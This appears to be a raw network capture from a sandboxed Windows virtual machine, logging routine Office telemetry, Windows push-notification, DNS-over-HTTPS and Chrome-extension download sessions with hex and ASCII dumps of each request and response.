                                                                                                                                                                                                                                                                                              Set-Cookie: ARRAffinity=08d2043fe0eddf6a1a4774ef0097be85709acca5523117bc62455fbc08a48784;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                              Set-Cookie: ARRAffinitySameSite=08d2043fe0eddf6a1a4774ef0097be85709acca5523117bc62455fbc08a48784;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                              Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                                                              X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              30192.168.2.64975813.107.246.63443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:32 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:32 GMT
                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                              x-ms-request-id: 37db9b91-d01e-0066-0516-41ea17000000
                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                              x-azure-ref: 20241128T062232Z-174f7845968nxc96hC1EWRspw80000000xsg000000008pmn
                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              31192.168.2.64977520.198.119.143443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:32 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 65 36 6d 43 68 6b 63 58 72 6b 43 74 74 41 56 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 64 39 62 63 66 30 66 65 31 31 39 35 64 36 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: e6mChkcXrkCttAVn.1Context: cd9bcf0fe1195d65
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:32 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:32 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 65 36 6d 43 68 6b 63 58 72 6b 43 74 74 41 56 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 64 39 62 63 66 30 66 65 31 31 39 35 64 36 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 75 30 6e 7a 46 74 78 61 77 47 2b 62 4c 68 74 52 6e 32 41 44 6c 4a 49 46 78 41 51 66 73 49 6d 61 65 71 50 73 70 52 73 73 6e 72 71 71 61 2f 62 65 4e 5a 77 2f 75 5a 59 78 30 6d 59 6a 67 42 4a 4c 52 4b 35 76 46 77 57 4b 58 58 2f 57 2f 76 6d 6a 6f 56 39 39 32 49 6c 68 68 50 34 6f 37 6b 66 42 69 55 4f 73 76 57 57 55 32 77 31 2b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: e6mChkcXrkCttAVn.2Context: cd9bcf0fe1195d65<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXu0nzFtxawG+bLhtRn2ADlJIFxAQfsImaeqPspRssnrqqa/beNZw/uZYx0mYjgBJLRK5vFwWKXX/W/vmjoV992IlhhP4o7kfBiUOsvWWU2w1+
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:32 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 65 36 6d 43 68 6b 63 58 72 6b 43 74 74 41 56 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 64 39 62 63 66 30 66 65 31 31 39 35 64 36 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: e6mChkcXrkCttAVn.3Context: cd9bcf0fe1195d65<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 2b 78 51 35 39 31 4e 66 55 4f 45 75 41 65 6b 4c 4a 4b 4c 76 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: 1+xQ591NfUOEuAekLJKLvg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              32192.168.2.649806172.64.41.34438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:33 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8e9843a23e4f429b-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fa 51 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom,Q)


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              33192.168.2.649804172.64.41.34438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:33 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8e9843a27f167c6a-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0d 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              34192.168.2.649805162.159.61.34438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                              Date: Thu, 28 Nov 2024 06:22:33 GMT
                                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8e9843a27d4f8c8d-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d5 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              35192.168.2.649797172.217.19.2254438000C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:33 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC566INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Content-Length: 138356
                                                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC4ZjqXlR9c2WaJAkMQ9T29mKgZyUWAl30zlMeVWfVqvo7yS4sz72IU_VKJYbTtI74Oc9rQ
                                                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                              Expires: Thu, 27 Nov 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                              Age: 49054
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                              ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC824INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                              Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83 9c c3 33
                                                                                                                                                                                                                                                                                              Data Ascii: :__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\|=3
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8 46 34 c8
                                                                                                                                                                                                                                                                                              Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=F4
                                                                                                                                                                                                                                                                                              2024-11-28 06:22:34 UTC1390INData Raw: 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26 ca 94 9e
                                                                                                                                                                                                                                                                                              Data Ascii: }oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
